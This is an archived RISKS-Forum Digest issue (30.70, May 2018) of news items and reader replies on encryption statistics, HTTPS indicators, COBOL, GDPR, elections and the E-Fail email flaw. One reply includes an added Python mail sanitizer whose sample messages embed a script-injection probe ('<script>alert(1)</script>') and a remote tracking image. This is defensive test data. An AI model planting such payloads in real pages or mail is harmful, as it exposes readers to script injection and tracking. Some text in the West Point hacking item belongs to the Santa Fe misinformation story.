    http://www.washingtonpost.com/world...68ae90-5dce-11e8-a4a4-c070ef53f315_story.html

    The FBI has repeatedly provided grossly inflated statistics to Congress and
    the public about the extent of problems posed by encrypted cellphones,
    claiming investigators were locked out of nearly 7,800 devices connected to
    crimes last year when the correct number was much smaller, probably between
    1,000 and 2,000, The Washington Post has learned. [They've actually been
    triple-counting! PGN]

    Over a period of seven months, FBI Director Christopher A. Wray cited the
    inflated figure as the most compelling evidence for the need to address what
    the FBI calls Going Dark -- the spread of encrypted software that can block
    investigators' access to digital data even with a court order.

    The FBI first became aware of the miscount about a month ago and still does
    not have an accurate count of how many encrypted phones they received as
    part of criminal investigations last year, officials said. Last week, one
    internal estimate put the correct number of locked phones at 1,200, though
    officials expect that number to change as they launch a new audit, which
    could take weeks to complete, according to people familiar with the work. [...]

    [See EFF's take on this:
    http://www.eff.org/deeplinks/2018/05/fbi-admits-it-inflated-number-supposedly-unhackable-devices
    PGN]

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Google to remove "secure" indicator from HTTPS pages on Chrome"
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: Thu, 17 May 2018 15:55:43 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Google's Selfish Ledger is an unsettling vision of Silicon Valley
    social engineering (The Verge)

    Google has built a multibillion-dollar business out of knowing everything
    about its users. Now, a video produced within Google and obtained by The
    Verge offers a stunningly ambitious and unsettling look at how some at the
    company envision using that information in the future.

    The video was made in late 2016 by Nick Foster, the head of design at X
    (formerly Google X), and a co-founder of the Near Future Laboratory. The
    video, shared internally within Google, imagines a future of total data
    collection, where Google helps nudge users into alignment with their goals,
    custom-prints personalized devices to collect more data, and even guides the
    behavior of entire populations to solve global problems like poverty and
    disease.

    When reached for comment on the video, an X spokesperson provided the
    following statement to The Verge:

    “We understand if this is disturbing -- it is designed to be. This is a
    thought-experiment by the Design team from years ago that uses a technique
    known as ‘speculative design’ to explore uncomfortable ideas and concepts
    in order to provoke discussion and debate. It's not related to any current
    or future products.”

    http://www.theverge.com/2018/5/17/17344250/google-x-selfish-ledger-video-data-privacy

    ------------------------------

    Date: Fri, 18 May 2018 09:31:10 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "A flaw in a connected alarm system exposed vehicles to remote
    hacking" (ZDNet)

    Zack Whittaker for Zero Day | 17 May 2018
    http://www.zdnet.com/article/flaw-connected-alarm-system-exposed-vehicles-remote-hacking/

    The researchers said it was easy to locate a nearby car, unlock it, and
    drive away.

    opening text:

    A bug that allowed two researchers to gain access to the backend systems of
    a popular Internet-connected vehicle management system could have given a
    malicious hacker everything they needed to track the vehicle's location,
    steal user information, and even cut out the engine.

    In a disclosure this week, the researchers Vangelis Stykas and George
    Lavdanis detailed a bug in a misconfigured server run by Calamp, a
    telematics company that provides vehicle security and tracking, which gave
    them "direct access to most of its production databases."

    ------------------------------

    Date: Thu, 17 May 2018 20:55:36 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Syrian hackers who tricked reporters indicted (WashPo)

    The pair used phishing schemes to compromise news organizations.

    http://www.washingtonpost.com/local...9ef328-59e7-11e8-858f-12becb4d6067_story.html

    ------------------------------

    Date: Fri, 18 May 2018 08:57:22 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Cisco critical flaw warning: These 10/10 severity bugs need
    patching now" (ZDNet)

    Liam Tung, ZDNet, 17 May 2018

    http://www.zdnet.com/article/cisco-critical-flaw-warning-these-1010-severity-bugs-need-patching-now/

    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    Cisco's software for managing software-defined networks has three critical,
    remotely exploitable vulnerabilities.

    ------------------------------

    Date: Thu, 17 May 2018 21:01:00 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Is technology bringing history to life or distorting it? (WashPo)

    From a digitized JFK speech that he never gave to colorized Lincoln and
    Holocaust photos, scholars are debating a wave of historical re-creation
    and manipulation.

    http://www.washingtonpost.com/news/...gy-bringing-history-to-life-or-distorting-it/

    ------------------------------

    Date: Tue, 22 May 2018 09:26:21 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)

    http://www.bostonglobe.com/metro/20...could-wrong/D7fX11PReUWzVsAAdqC1qN/story.html

    ------------------------------

    Date: Tue, 22 May 2018 09:18:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)

    http://www.bostonglobe.com/news/nat...a-cum-laude/npFzLAzg2b7w54247o3MIO/story.html

    [I won't insult long-time RISKS readers with pointers to the predecessors
    of this item. There are too many. PGN]

    ------------------------------

    Date: Wed, 16 May 2018 07:47:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: The surprising return of the repo man (WashPo)

    New technology and bad auto loans mean more cars are being taken back.

    http://www.washingtonpost.com/busin...fcd30e-4d5a-11e8-af46-b1d6dc0d9bfe_story.html

    ------------------------------

    Date: Tue, 22 May 2018 15:59:15 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)

    Report: President Trump clings to his Twitter phone, reluctant to allow
    security checks.

    http://arstechnica.com/information-...tial-smartphone-security-is-too-inconvenient/

    Security ... inconvenient. Who knew?

    ------------------------------

    Date: Sat, 19 May 2018 10:22:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to
    Win Election (NY Times)

    NNSquad
    http://www.nytimes.com/2018/05/19/u...r-prince-zamel.html?smid=tw-nytimes&smtyp=cur

    Three months before the 2016 election, a small group gathered at Trump
    Tower to meet with Donald Trump Jr., the president's eldest son. One was
    an Israeli specialist in social media manipulation. Another was an
    emissary for two wealthy Arab princes. The third was a Republican donor
    with a controversial past in the Middle East as a private security
    contractor.

    ------------------------------

    Date: Thu, 17 May 2018 10:00:20 -0700
    From: "Mark E. Smith" <mym...@gmail.com>
    Subject: Re: Securing Elections (RISKS-30.69)

    PGN cites Bruce Schneier:

    "Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them."

    Elections serve a third purpose, one which I think is much more important
    than accurately choosing a winner and convincing the loser: US elections are
    intended to make people think that they have a say in government when they
    don't.

    Some of the framers of the Constitution were concerned about the possibility
    of the "mob and rabble" eventually getting the vote and using it to obtain a
    voice in government. So they made no Constitutional provision that the
    popular vote had to be counted (Bush v. Gore 2000). They also took other
    precautions. They made Congress the sole judge of the "Elections, Returns,
    and Qualifications" of its Members, and the only venue where the loser of a
    rigged election could appeal. But by the time they file that appeal, the
    "winner" has usually already been sworn into office, and Congress doesn't
    like to remove sitting members, so if anyone is aware of an appeal that has
    been successful, I'd like very much to know about it.

    We are so accustomed to a losing candidate taking office, that it isn't even
    noteworthy these days. The Supreme Court can intervene to seat the loser, or
    the winner can concede and throw the election to the loser. In a democratic
    system, such events would result in a new election, not in handing over
    office to somebody who wasn't elected.

    These realizations and others led me to informally poll the groups of
    election integrity activists I was part of at that time, with shocking
    results. I asked if they would still vote if the only permissible voting
    machine was a flush toilet. Approximately 50% stated that they would
    continue to vote, even if they knew for a fact that their vote would not be
    counted and would be flushed away as soon as they cast their ballot. Some
    angrily accused me of trying to take away their precious right to vote, for
    which their ancestors had fought and died.

    So I repeated the poll online and got the same result. About 50% of voters
    appear to be concerned with casting their votes, not about whether their
    votes are actually counted, no less counted accurately. They associate
    democracy with elections, so they believe that if they vote, whether or not
    their votes are counted accurately (or at all), they are participating in
    democracy.

    If votes are not counted, or are not counted accurately, voters are not
    electing anyone. But for a political system to be called democratic, voters
    would have to have a way to hold their elected officials accountable. Our
    system does this by allowing voters to cast more uncounted, miscounted, or
    overruled ballots once the incumbent's term of office is over. So if someone
    is elected, whether legitimately or fraudulently, and then decides to
    destroy the country (perhaps by nuking a few cities to end the homelessness
    and poverty problems, or some other ill-conceived ventures), the voters can
    do nothing but wait until their term in office is over, if anyone has
    survived, to try to hold them "accountable" by "electing" another
    unaccountable official. There is no right of recall at the federal level,
    therefore no means of holding "elected" officials accountable in a timely
    way.

    With mail-in ballots, which seem to predominate these days, there is no
    chain-of-custody possible. The offices of election officials are closed to
    the public between the election and the certification, and official
    observers aren't always notified when votes are counted, so corrupt
    elections officials have plenty of time to manufacture phantom votes, stuff
    the electronic "ballot boxes," and manipulate the actual results to match
    the results they want. As for audits, you can't ask for an audit until after
    the election has been certified (election officials certify only that an
    election was held in accordance with law, not that it was accurate), by
    which time the fraudulent "winner" has usually already been sworn into
    office and cannot be removed except by Congress. Many Members of Congress,
    like Nancy Pelosi, believe that it is more important that constituents be
    represented, than that they be represented by the person they voted
    for. Members of Congress are very well aware that voters have no way to hold
    them accountable, so they see no difference between people being
    "represented" by candidates who will and candidates who won't actually
    represent their interests. Once you vote (and hopefully donate to the
    campaign war chests of a few billionaires), your job is done and the
    elections have been a success. People who vote believe, at a minimum, that
    there might be a slight chance that their vote could be counted and that
    someone willing to represent them might be elected, so the primary purpose
    of elections, to make people think that they have a voice in government when
    they don't, has been achieved.

    Even if we could somehow manage to get them, transparent, auditable
    elections wouldn't eliminate risks to democracy. Our system, under a
    Constitution where the votes don't have to be counted, the Supreme Court can
    intervene to change the outcome, and those elected can't be held
    accountable, isn't electoral democracy, it is electoral tyranny, and your
    vote is your consent.

    ------------------------------

    Date: Sat, 19 May 2018 11:56:43 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Dark code (DW, RISKS-30.69)

    I never had any problem getting COBOL to interact with other languages, from
    PL/I to FORTRAN, C, and assembler. If you Read the Fine Manual and followed
    the guidance it worked even before IBM Language Environment united them into
    a single run time environment. Legacy COBOL didn't have function calls, but
    those could be replaced by a parameterized subroutine call with the output
    variables as named arguments in the call parameter list.

    At the 2014 IEEE International Conference on Software Maintenance and
    Evolution I was struck by the absence of any interest or work in applying
    the very effective techniques developed for refactoring C and Java code to
    COBOL. I would have thought that there is a huge market for something that
    can process legacy COBOL code and refactor it into COBOL or newer languages,
    recovering and improving the design along the way.

    COBOL is a relatively orthogonal language. There is usually only one
    obvious or builtin way to do something. In PL/I there are usually 10
    different ways, few of which give optimal performance. Once you have
    considered

        ADD GIN TO VERMOUTH GIVING MARTINI;

    there aren't a lot of other options beyond

        COMPUTE MARTINI = VERMOUTH + GIN;

    http://ieeexplore.ieee.org/xpl/mostRecentIssue.jsp?punumber=6969845

    Working with Honeywell COBOL was something of a challenge, because byte size
    varied from 4 to 9 bits, depending on the Data Type. That could give some
    surprising 4 bit to 8 or 9 bit text conversion results when Group moves were
    interpreted as text based moves of a number of bytes. Packed Decimal data
    fields were considered to be 4 bit text, with every 9th bit a slack bit to
    restore alignment on a 9 or 36 bit boundary on those 36 bit word
    machines. Going through an IBM structured EBCDIC, binary and decimal tape
    master file deciding how to convert series of bytes to an appropriate HIS
    COBOL ASCII, binary or decimal format, depending on the context and data
    segment prefix was challenging, but doable. Ditto for the reverse process
    creating a tape to send back to the IBM computer in the same data centre.

    ------------------------------

    Date: Mon, 21 May 2018 22:44:51 +1200
    From: "Richard O'Keefe" <rao...@gmail.com>
    Subject: Re: Dark Code (DW, RISKS-30.69)

    The article noted by Wendy Grossman says things like "COBOL has to evolve"
    and implies that interoperation with new systems is especially difficult.

    COBOL *has* evolved. The current standard is from 2014. If you want to
    interoperate with Java, there are COBOL compilers that do that (like Elastic
    COBOL). If you want to interoperate with .Net, there's NetCOBOL to do that.
    And since standard COBOL has been an OO language since 2002, those are
    better fits than you might think. Modern compilers are catching up with the
    standards, but it always takes time. What if you want to interoperate using
    XML or JSON? IBM's COBOL for z/OS, release 6.2 supports XML and has JSON
    PARSE and JSON GENERATE statements.

    Of course modern COBOL is still COBOL underneath and while I'm OK reading
    it, I would have to be paid large sums of money to write it. Though the
    various Eclipse plugins that exist for COBOL should make that a lot easier
    than it used to be.

    So if COBOL *has* evolved and *does* interoperate and *does* have modern
    development tools, what's the problem?

    Well, COBOL has evolved, for one thing. I rather liked the compatibility
    remark in the Brand X documentation: a certain aspect used to be
    incompatible with the standard, but the standard has changed, and now we are
    compatible. And COBOL interoperates: if you have a COBOL program that used
    DMS II or IMS adapting it to a different data base system won't be easy.
    There's one large COBOL system I'm aware of where out of (operating system,
    data base system, programming language) COBOL is the *best* known part
    today.

    As for training, COBOL is verbose in the extreme and the standards and
    reference materials combine long-windedness with less precision than I'm
    comfortable with, BUT it's really not that hard to learn. And if people
    succeeded in writing useful programs that are still running decades later,
    that says *something* positive about the language.

    I suspect the problems are mostly mundane ones of poor documentation,
    inadequate test sets, institutional knowledge lost when people resigned,
    retired, or died, all of which have nothing to do with the language.

    ------------------------------

    Date: Fri, 18 May 2018 16:45:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Fitness App Leads To Arrest For Attack On McLean Cyclist
    (McLean, VA Patch)

    http://patch.com/virginia/mclean/fitness-app-leads-arrest-attack-mclean-cyclist

    Not quite a risk to the user -- more a public service finding him as violent
    assailant. But more details would have been nice, e.g., how police
    identified tracker used, then person wearing it.

    ------------------------------

    Date: Sat, 19 May 2018 17:54:44 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Man Is Charged With Hacking West Point and Government Websites (NYT)

    http://www.nytimes.com/2018/05/10/nyregion/hacker-west-point-nyc-comptroller.html

    The man, who is thought to have hacked thousands of sites around the world,
    was arrested in California and could face up to 21 years in prison.

    "But some social media watchers said they were still surprised at the speed
    with which the Santa Fe shooting descended into information warfare.
    Sampson said he watched the clock after the suspect was first named by
    police to see how long it would take for a fake Facebook account to be
    created in the suspect's name: less than 20 minutes."

    If, as a hypothetical, Facebook required formal authentication of identity
    for account creation, such as confirmation of applicant's existence via a
    national birth registry, bona fide biometric comparison, and revenue/tax
    authority check, fake users would approach zero. This assumes these
    credentials are not stolen, or these government entities are not
    man-in-the-middle attack subjects.

    Internet anonymity would become harder to achieve along with criticism and
    free discussion of important global, national, and local issues that
    anonymity often promotes.

    Authentication, in a democracy, appears strongest for convicted criminals
    and individuals possessing security clearances. Expense and the law
    forestall establishment of mandatory, nation-wide authentication
    identification franchise.

    Will future political expedience compel adoption? An informed electorate
    should possess the wisdom and exclusive right to decide on this ominous
    subject.

    ------------------------------

    Date: Sat, 19 May 2018 15:24:51 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Fake Facebook accounts and online lies multiply in hours after
    Santa Fe school shooting (WashPo)

    It has become a familiar pattern in the all-too-common aftermath of American
    school shootings: A barrage of online misinformation, seemingly designed to
    cloud the truth or win political points. But some were still surprised at
    the speed with which the Santa Fe shooting descended into information
    warfare.

    http://www.washingtonpost.com/news/...iply-in-hours-after-santa-fe-school-shooting/

    [See also: Russian Trolls Instantly Spread Fake News Online About Alleged
    Santa Fe School Shooter (Dimitrios Pagourtzis),
    http://www.inquisitr.com/4905300/di...sian-trolls-facebook-santa-fe-school-shooter/
    PGN]

    ------------------------------

    Date: Thu, 17 May 2018 11:29:20 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (RISKS-30.69)

    I am to some extent involved (in that I have some minimal legal liability)
    in the implementation of the GDPR, and all I can say is that I whole-heartedly
    approve. In Europe we seem to have this belief - apparently unheard of to
    Americans - that openness and fair dealing is much better all round.

    The GDPR enshrines good practice in law. It merely forces organisations to
    do what they should have been doing anyway. It also outlaws a bunch of sharp
    practices - which is why it's causing so much grief because those sharp
    practices were also common practice.

    The law divides into two groups, data USERS and data SUBJECTS. It places an
    obligation on data users to obtain *informed* consent. It also places an
    obligation to have a *record* of such consent. Which is why you're getting
    all these emails and letters to opt back in.

    Because so many permissions were granted by data SUBJECTS who didn't realise
    that the data USER had kindly pre-ticked a bunch of permission boxes giving
    the data user permission to do pretty much anything they wanted to. This
    sharp practice is now illegal.

    It also reinforces the right of the data SUBJECT to have any data the data
    user holds about them to be corrected or deleted (subject to other legal
    constraints, of course).

    In summary, if you are a decent organisation (the law doesn't apply to
    individuals), doing things properly, and keeping a decent paper trail, this
    legislation is pretty much a non-event.

    Of course, this summary does not account for incompetent implementation of
    the directive by politicians (par for the course, sadly), or incompetent
    CxO's who don't understand the legislation (sadly also par for the
    course). And sadly also apparently true for the person in charge of the
    directive at my organisation :-(

    ------------------------------

    Date: Wed, 23 May 2018 12:47:09 -0700
    From: Yooly <nah...@yahoo.co.jp>
    Subject: Re: Not So Pretty: What You Need to Know About E-Fail and the PGP
    Flaw (EFF, RISKS-30.69)

    This is not a PGP flaw but a problem arising from using HTML in email, the
    consequence of a stupid choice made years ago. I had assumed nobody would
    bat an eye upon seeing the term "HTML" being mentioned in the same breath as
    "mail client", but fortunately I was proven wrong: Atlantic Magazine's May
    21, 2018, issue carries an article with the title "Email Is Dangerous", from
    which I quote the following:

    "Matt Blaze, an associate professor of computer and information science at
    the University of Pennsylvania, took to Twitter after the Efail announcement
    to say, 'I've long thought HTML email is the work of the devil, and now we
    have proof I was right. But did you people listen? You never listen.'"

    http://www.theatlantic.com/technology/archive/2018/05/email-is-dangerous/560780/

    Alternative URL, if the original URL for the article ends up broken in the message you read:
    http://shorturl.at/gltZ6

    Years ago, after someone had started using HTML with email, I tried to
    convince people to refrain from using software that inserted HTML into their
    messages, but this turned out to be a lost cause, so I have instead been
    focusing on protecting myself: my mail software reliably strips all
    JavaScript and HTML from messages before they end up in my Inbox - and I am
    still alive and manage to communicate via email for work and pleasure (who'd
    a'thunk?).
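
    As an added example (not the poster's own mail software), here is a Python filter that does what the post describes for a MIME message: it keeps text/plain parts, turns HTML-only mail into text without fetching any remote resource, and drops everything else. The two sample messages are constructed for this example.

```python
"""Defensive HTML stripping for incoming mail, in the spirit of the post above.

Added example, not the poster's own mail software. Keeps text/plain parts,
turns HTML-only messages into text without fetching any remote resource,
and drops everything else (scripts, styles, remote images, attachments).
The two sample messages at the bottom are constructed for this example.
"""
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser


class _TextOnly(HTMLParser):
    """Collect the visible text of an HTML document; every tag and attribute
    (so no src= or href= survives) and every script/style body is ignored."""

    _BLOCK = {"br", "p", "div", "li", "tr", "h1", "h2", "h3"}

    def __init__(self) -> None:
        super().__init__()
        self._skip = 0            # >0 while inside <script> or <style>
        self.chunks: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        elif tag in self._BLOCK:
            self.chunks.append("\n")   # keep a line break for block elements

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def html_to_text(html: str) -> str:
    """Plain text of an HTML body; nothing is fetched and no markup survives."""
    parser = _TextOnly()
    parser.feed(html)
    parser.close()
    lines = (" ".join(line.split()) for line in "".join(parser.chunks).splitlines())
    return "\n".join(line for line in lines if line)


def sanitize_message(raw: bytes) -> EmailMessage:
    """Rebuild a raw RFC 5322 message as a single text/plain message."""
    src = message_from_bytes(raw, policy=policy.default)
    plain, html = [], []
    for part in src.walk():
        ctype = part.get_content_type()
        if ctype == "text/plain":
            plain.append(part.get_content())
        elif ctype == "text/html":
            html.append(part.get_content())
        # every other part type (images, attachments, containers) is discarded
    if plain:
        body = "\n".join(plain)                     # prefer the sender's own plain text
    else:
        body = "\n".join(html_to_text(h) for h in html)
    out = EmailMessage()
    for name in ("From", "To", "Subject", "Date", "Message-ID"):
        if name in src:
            out[name] = src[name]
    out.set_content(body)
    return out


def sanitized_body(raw: bytes) -> str:
    """The plain-text body a reader would see after filtering."""
    return sanitize_message(raw).get_content()


# Constructed sample: multipart/alternative with a plain part and an HTML part
# that references a remote image and carries a script.
MULTIPART_RAW = b"""\
From: alice@example.invalid
To: bob@example.invalid
Subject: Quarterly numbers
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Plain text copy of the message.
--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Plain text copy of the message.</p>
<img src="https://example.invalid/remote.png">
<script>alert(1)</script></body></html>
--b1--
"""

# Constructed sample: HTML-only message with no plain-text alternative.
HTML_ONLY_RAW = b"""\
From: carol@example.invalid
To: bob@example.invalid
Subject: Reminder
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Meeting moved to <b>3pm</b>.</p>
<img src="https://example.invalid/pixel.gif"><script>alert(1)</script></body></html>
"""

if __name__ == "__main__":
    print(sanitized_body(MULTIPART_RAW))
    print(sanitized_body(HTML_ONLY_RAW))
```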

    ------------------------------

    Date: Thu, 17 May 2018 11:09:41 -0400
    Subject: Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll
    (NYT)

    I have such a car myself (not a Toyota, but another brand with "keyless"
    operation). It does have an audible and visual warning when I exit the
    running car and take the key with me. But, I've exited the car, so what good
    is the warning? I don't actually see and hear it until I get back into the
    car. What I do hear is the engine running, both before I exit and after I
    start walking. Was this model perhaps a hybrid that was in silent electric
    mode at the time? And if so, wouldn't a better check be to not re-start the
    engine without the keyfob sensed?

    ------------------------------

    Date: Fri, 18 May 2018 13:33:13 -0500
    From: Dimitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Chinese GPS (RISKS-30.69)

    Nothing new there.

    Back in the USSR it was the subject of many jokes, e.g. a foreign spy asking
    a local about some landmark marked on his map that isn't there. The local
    answers "these maps are garbage, see that top-secret `nucular' missile plant
    over there? -- it's right next to that".

    ------------------------------

    Date: Sat, 19 May 2018 10:50:06 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: The risk from robot weapons (RISKS-30.69)

    During WWII, the Russians trained dogs to hide under tanks when they heard
    gunshots. Then they tied bombs to their backs and sent them to blow up
    German tanks. Or so was the plan.

    What the Russians did not take into account, was that the dogs were trained
    with Russian tanks, which used diesel, but the German tanks used gasoline,
    and smelled different. So when hearing gunshots, the dogs immediately ran
    under the nearest *Russian* tank.

    This tale is about natural intelligence, which we're supposed to understand.
    The problem with AI, especially *learning machines*, is that we can try to
    control what they do, but cannot control how they do it.

    So we never know, even when we get correct answers, whether the machine had
    found some logic path to the answer, or maybe the answer just *smells
    right*. In the latter case, we might be surprised when asking questions we
    do not know the right answer to.

    ------------------------------

    Date: Sun, 20 May 2018 09:42:48 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Will You Be My Emergency Contact Takes On a Whole New Meaning
    (The New York Times)

    http://www.nytimes.com/2018/05/17/h...html?rref=collection/sectioncollection/health

    "Will you be my emergency contact?

    "When you’re dating, the question is a sign that you’ve made it to the
    this-is-really-serious category. When you’re friends, it’s a sign that
    you’re truly beloved or truly responsible. And if you’re related, it may
    mean that you will now be entered into a medical study together so
    scientists can figure out if sinus infections or anxiety run in your
    family.

    "What? That's right. Researchers have begun experimenting with using
    emergency contacts gathered from medical records to build family trees
    that can be used to study the heritability of hundreds of different
    attributes, and possibly advance research into diseases and responses to
    medications."

    HIPAA-restricted information becomes patient-surrendered anonymized
    information for research purposes with a right-to-use disclosure form.
    Networks of contacts await discovery for correlation with other reference
    sources. The medical insurance industry should take note and enhance patient
    database surveillance activities.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:02 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)

    John Zhang produced a three-parent baby, implanted abnormal embryos and
    wants to help 60-year-old women have children.

    http://www.washingtonpost.com/natio...9105dc-1831-11e8-8b08-027a6ccb38eb_story.html

    ------------------------------

    Date: Sat, 19 May 2018 17:55:46 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    (NYTimes)

    http://www.nytimes.com/2018/05/14/science/biohackers-gene-editing-virus.html

    After researchers created a virus from mail-order DNA, geneticists sound the alarm about the genetic tinkering carried out in garages and living rooms.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.70
    ************************
  4. LakeGator

    Risks Digest 30.70

    RISKS List Owner

    May 26, 2018 7:09 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 26 May 2018 Volume 30 : Issue 70

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)
    Don't Put That in My Heart Until You're Sure It Really Works (NYT)
    "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)
    "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)
    Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)
    "This cryptocurrency phishing attack uses new trick to drain wallets"
    (Danny Palmer)
    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)
    ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)
    E-Mail Clients are Insecure, PGP and S/MIME 100% secure
    E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)
    "Senator wants to know how police can locate any phone in seconds without
    a warrant" (Zach Whittaker)
    US cell carriers are selling access to your real-time phone location data
    (Zach Whittaker)
    Hundreds of Apps Can Empower Stalkers to Track Their Victims (NYTimes)
    "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into
    secret eavesdroppers" (CSO Online)
    So, Umm, Google Duplex's Chatter Is Not Quite Human (Scientific American)
    Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence (The Wrap)
    Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)
    Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)
    Most GDPR emails unnecessary and some illegal, say experts (The Guardian)
    The Pentagon Has a Big Plan to Solve Identity Verification in Two Years
    (Defense One)
    Unplug Your Echo! (Ars Technica)
    FBI dramatically overstates how many phones they can't get into (WaPo)
    "Google to remove "secure" indicator from HTTPS pages on Chrome" (ZDNet)
    Google's Selfish Ledger is an unsettling vision of Silicon Valley social
    engineering (The Verge)
    "A flaw in a connected alarm system exposed vehicles to remote hacking"
    (ZDNet)
    Syrian hackers who tricked reporters indicted (WashPo)
    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    (ZDNet)
    Is technology bringing history to life or distorting it? (WashPo)
    Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)
    Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)
    The surprising return of the repo man (WashPo)
    Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)
    Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to Win
    Election (NY Times)
